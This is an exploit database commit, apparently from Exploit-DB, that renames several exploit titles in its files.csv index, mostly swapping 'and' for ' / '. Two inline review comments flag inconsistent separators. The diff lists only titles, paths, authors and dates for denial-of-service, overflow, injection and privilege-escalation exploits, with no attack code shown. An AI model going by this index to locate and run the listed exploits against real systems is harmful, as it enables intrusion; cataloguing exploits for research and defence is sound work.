DB: 2017-10-12

5 new exploits

MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit
MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion Exploit

Amaya Web Editor 11.0 - XML and HTML parser Vulnerabilities
Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities

Apple Safari & QuickTime - Denial of Service
Apple Safari / QuickTime - Denial of Service

Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities
Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities

Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities
Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Unspecified Vulnerabilities

Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service
Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service

Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities
Multiple Adobe Products - XML External Entity / XML Injection Vulnerabilities

Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow
Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow

Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption
Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption

Mozilla Firefox - Interleaving document.write and appendChild Denial of Service
Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service

Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service
Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service

BRS Webweaver 1.0 4 - POST and HEAD Denial of Service
BRS Webweaver 1.0 4 - POST / HEAD Denial of Service

Microsoft IIS 5.0 - WebDAV PROPFIND and SEARCH Method Denial of Service
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service

Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service
Microsoft Internet Explorer 5.0.1 - Malformed .IMG / .XML Parsing Denial of Service

Extended Module Player (xmp) 2.5.1 - 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities
Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities

Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035)
Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)

Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow
Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow

Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption
Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption

Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption
Nitro Pro 10.5.7.32 / Nitro Reader 5.5.3.1 - Heap Memory Corruption

Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)
Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)

Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption
Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption

Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages (MS17-017)
Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)

Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys and tcpip.sys
Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys

binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow

BSD & Linux umount - Privilege Escalation
BSD / Linux - 'umount'  Privilege Escalation

BSD & Linux lpr - Privilege Escalation
BSD / Linux - 'lpr' Privilege Escalation

DelphiTurk CodeBank 3.1 - Local 'Username' and Password Disclosure
DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure

SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption
SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption

Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation
Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation

ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass)
ASX to MP3 converter < 3.1.3.7 - '.asx' Stack Overflow (DEP Bypass)
ASX to MP3 3.1.3.7 - '.m3u' Buffer Overflow

Microsoft Windows - WINS Vulnerability and OS/SP Scanner
Microsoft Windows - WINS Vulnerability + OS/SP Scanner

Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)
Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit

Mozilla Firefox - Interleaving document.write and appendChild Exploit (Metasploit)
Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Exploit (Metasploit)

Quest InTrust 10.4.x - ReportTree and SimpleTree Classes
Quest InTrust 10.4.x - ReportTree / SimpleTree Classes

SunOS 4.1.3 - LD_LIBRARY_PATH and LD_OPTIONS
SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit

RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd
RedHat Linux 5.1 / Caldera OpenLinux Standard 1.2 - Mountd

Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files
Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files

tcpdump 3.4 - Protocol Four and Zero Header Length
tcpdump 3.4 - Protocol Four / Zero Header Length

Symantec pcAnywhere 12.5.0 - Login and Password Field Buffer Overflow
Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Buffer Overflow

Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit
Microsoft Internet Explorer 5.0/4.0.1 - iFrame Exploit

Internet Security Systems ICECap Manager 2.0.23 - Default 'Username' and Password
Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password

Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure
Technote 2000/2001 - 'Filename' Parameter Command Execution and File Disclosure

WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow
WFTPD 3.0 - 'RETR' / 'CWD' Buffer Overflow

EFTP Server 2.0.7.337 - Directory and File Existence
EFTP Server 2.0.7.337 - Directory Existence / File Existence

Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting
Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting

InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities
InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities

Microsoft Windows XP - Help And Support Center Interface Spoofing
Microsoft Windows XP - Help and Support Center Interface Spoofing

BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit)
BigAnt Server 2.97 - SCH / DUPF Buffer Overflow (Metasploit)

Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure
Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure

Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting
Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting

3D-FTP 8.01 - 'LIST' and 'MLSD' Directory Traversal
3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal

Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting
Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting

Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read
Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read

Github Enterprise - Default Session Secret And Deserialization (Metasploit)
Github Enterprise - Default Session Secret and Deserialization (Metasploit)

VX Search Enterprise 10.1.12 - Buffer Overflow

QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities
Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities

Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion
Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion

FlexPHPNews 0.0.6 & PRO - Authentication Bypass
FlexPHPNews 0.0.6 / PRO - Authentication Bypass

click&rank - SQL Injection / Cross-Site Scripting
Click&Rank - SQL Injection / Cross-Site Scripting

WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures
WordPress Core / MU / Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures

PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass
Pre Hotels&Resorts Management System - Authentication Bypass

PHP-Nuke CMS - (Survey and Poll) SQL Injection
PHP-Nuke CMS (Survey and Poll) - SQL Injection

60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)
60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)

XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup
XT-Commerce 1.0 Beta 1 - Pass / Create and Download Backup

Allomani Songs & Clips Script 2.7.0 - Cross-Site Request Forgery (Add Admin)
Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin)

Sun i-Runbook 2.5.2 - Directory And File Content Disclosure
Sun i-Runbook 2.5.2 - Directory and File Content Disclosure

DUclassmate 1.x - account.asp MM-recordId Parameter Arbitrary Password Modification
DUclassmate 1.x - 'account.asp MM-recordId' Arbitrary Password Modification
DUforum 3.x - messages.asp FOR_ID Parameter SQL Injection
DUforum 3.x - messageDetail.asp MSG_ID Parameter SQL Injection
DUforum 3.x - 'messages.asp FOR_ID' SQL Injection
DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection

SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation And Input Validation
SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation

JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion
JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusion

WordPress Plugin WP BackupPlus - Database And Files Backup Download
WordPress Plugin WP BackupPlus - Database and Files Backup Download

WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities
WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection

Gogs - (users and repos q pararm) SQL Injection
Gogs - users and repos q SQL Injection

WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection

Joomla! Component 'com_tree' - 'key' Parameter SQL Injection
Joomla! Component com_tree - 'key' Parameter SQL Injection

Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

WeBid - Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities
WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities

Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities
Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities

TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)
TOTOLINK Routers - Backdoor / Remote Code Execution (PoC)
up.time 7.5.0 - Arbitrary File Disclose And Delete Exploit
up.time 7.5.0 - Upload And Execute File Exploit
up.time 7.5.0 - Arbitrary File Disclose and Delete Exploit
up.time 7.5.0 - Upload and Execute Exploit

Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass
Wildfly - 'WEB-INF' / 'META-INF' Information Disclosure via Filter Restriction Bypass

WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting
WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting

WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting
WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting

WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting
WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting
Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
Offensive Security 2017-10-12 05:01:34 +00:00
parent b77b178de0
commit 3cfdd1cc27
8 changed files with 737 additions and 86 deletions

173
files.csv

@ -227,7 +227,7 @@ id,file,description,date,author,platform,type,port
1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - 'HEAD' Denial of Service",2005-09-16,karak0rsan,windows,dos,0
1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command - Denial of Service",2005-09-19,basher13,windows,dos,0
1233,platforms/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service",2005-09-26,"Georgi Guninski",multiple,dos,0
1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0
1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0
1239,platforms/windows/dos/1239.c,"Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service",2005-10-02,"Luigi Auriemma",windows,dos,0
1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - Hijacking Command Denial of Service",2005-10-11,basher13,windows,dos,0
1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - 'RETR' Denial of Service",2005-10-14,wood,windows,dos,0
@ -927,7 +927,7 @@ id,file,description,date,author,platform,type,port
7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0
7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - '.m3u' Local Heap Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0
7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - '.gqmpeg' Buffer Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0
7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML and HTML parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0
7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0
7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - '.m3u' Crash (PoC)",2009-01-29,Hakxer,windows,dos,0
7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos,0
7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - '.asx' Off-by-One Crash",2009-01-30,Houssamix,windows,dos,0
@ -1073,7 +1073,7 @@ id,file,description,date,author,platform,type,port
8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos,0
8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 - Attacked IAX Fuzzer Resource Exhaustion (Denial of Service)",2009-06-12,"Blake Cornell",multiple,dos,0
8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - (syslog) Denial of Service",2009-06-15,h00die,linux,dos,0
8957,platforms/multiple/dos/8957.txt,"Apple Safari & QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0
8957,platforms/multiple/dos/8957.txt,"Apple Safari / QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0
8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,linux,dos,0
8964,platforms/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0
8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,windows,dos,0
@ -1116,7 +1116,7 @@ id,file,description,date,author,platform,type,port
9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash",2009-07-16,prodigy,windows,dos,0
9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0
9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0
9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0
9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0
9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos,0
@ -1242,7 +1242,7 @@ id,file,description,date,author,platform,type,port
10068,platforms/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos,0
10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,windows,dos,21
10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389
33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515
10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21
@ -1317,7 +1317,7 @@ id,file,description,date,author,platform,type,port
10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Exploit",2010-01-02,"fl0 fl0w",windows,dos,0
10947,platforms/hardware/dos/10947.txt,"Facebook for iPhone - Persistent Cross-Site Scripting Denial of Service",2010-01-03,marco_,hardware,dos,0
10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 - Denial of Service (PoC)",2010-01-03,anonymous,multiple,dos,0
11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0
11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0
11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0
11021,platforms/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Execution (PoC)",2010-01-06,superli,windows,dos,0
11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,windows,dos,0
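Review bot: the new 11009 row only lowercases "And" to "and" in "CIFS and AFP", while the other renames in this file replace a two-item "and" with " / " (for example "XML / HTML Parser" for 7902). If the slash is the intended separator for paired items, this title should read "CIFS / AFP Remote Memory Consumption Denial of Service"; if "and" is kept on purpose here, note the rule in the commit message so the two forms are not mixed by accident.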
@ -1395,7 +1395,7 @@ id,file,description,date,author,platform,type,port
11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)",2010-02-18,wirebonder,windows,dos,0
11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,ios,dos,0
11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Denial of Service",2010-02-22,Ale46,ios,dos,0
11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0
11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity / XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0
11531,platforms/windows/dos/11531.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0
11532,platforms/windows/dos/11532.html,"Winamp 5.57 - (Browser) IE Denial of Service",2010-02-22,cr4wl3r,windows,dos,0
11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - (iso compilation) Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,windows,dos,0
@ -1622,7 +1622,7 @@ id,file,description,date,author,platform,type,port
14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0
14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800
14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0
14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0
14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0
14282,platforms/windows/dos/14282.txt,"Microsoft Windows - 'cmd.exe' Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0
15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0
@ -1709,7 +1709,7 @@ id,file,description,date,author,platform,type,port
14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0
14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0
14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0
14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
14971,platforms/windows/dos/14971.py,"Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0
14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 - Multiple Modules Null Pointer Dereference Denial of Service",2010-09-11,d0lc3,windows,dos,0
14987,platforms/windows/dos/14987.py,"Kingsoft AntiVirus 2010.04.26.648 - Kernel Buffer Overflow",2010-09-13,"Lufeng Li",windows,dos,0
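Review bot: in the new 14967 title the " / " between the two browsers collides with the "/" already used inside the Safari version list "4.1.2/5.0.2", so "4.1.2/5.0.2 / Google Chrome" is harder to parse than the old "&" form. Consider a separator between products that differs from the one used between versions, since anything that searches or splits titles on "/" will now see three segments inside the parentheses.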
@ -1769,7 +1769,7 @@ id,file,description,date,author,platform,type,port
15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) - Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0
15334,platforms/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0
15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0
15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0
15342,platforms/multiple/dos/15342.html,"Mozilla Firefox - (Simplified) Memory Corruption (PoC)",2010-10-28,extraexploit,multiple,dos,0
15346,platforms/multiple/dos/15346.c,"Platinum SDK Library - post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0
15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0
@ -2451,7 +2451,7 @@ id,file,description,date,author,platform,type,port
20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - 'visiadmin.exe' Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0
20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0
20310,platforms/windows/dos/20310.txt,"Microsoft IIS 4.0 - Pickup Directory Denial of Service",2000-02-15,Valentijn,windows,dos,0
20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0
20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0
20323,platforms/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request Denial of Service",2000-10-25,"Alberto Solino",hardware,dos,0
20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",hardware,dos,0
20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (C)",1998-03-16,Rootshell,hardware,dos,0
@ -2868,14 +2868,14 @@ id,file,description,date,author,platform,type,port
22637,platforms/windows/dos/22637.pl,"Prishtina FTP Client 1.x - Remote Denial of Service",2003-05-23,DHGROUP,windows,dos,0
22638,platforms/irix/dos/22638.txt,"IRIX 5.x/6.x - MediaMail HOME Environment Variable Buffer Overflow",2003-05-23,bazarr@ziplip.com,irix,dos,0
22647,platforms/hardware/dos/22647.txt,"D-Link DI-704P - Syslog.HTM Denial of Service",2003-05-26,"Chris R",hardware,dos,0
22650,platforms/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST and HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0
22650,platforms/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST / HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0
22653,platforms/windows/dos/22653.py,"Smadav Anti Virus 9.1 - Crash (PoC)",2012-11-12,"Mada R Perdhana",windows,dos,0
22655,platforms/windows/dos/22655.txt,"Microsoft Publisher 2013 - Crash (PoC)",2012-11-12,coolkaveh,windows,dos,0
22660,platforms/php/dos/22660.txt,"PostNuke Phoenix 0.72x - Rating System Denial of Service",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,dos,0
22666,platforms/windows/dos/22666.txt,"Softrex Tornado WWW-Server 1.2 - Buffer Overflow",2003-05-28,D4rkGr3y,windows,dos,0
22667,platforms/windows/dos/22667.txt,"BaSoMail 1.24 - POP3 Server Denial of Service",2003-05-28,"Ziv Kamir",windows,dos,0
22668,platforms/windows/dos/22668.txt,"BaSoMail 1.24 - SMTP Server Command Buffer Overflow",2003-05-28,"Ziv Kamir",windows,dos,0
22670,platforms/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND and SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0
22670,platforms/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0
22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 - Crash (PoC)",2012-11-13,coolkaveh,windows,dos,0
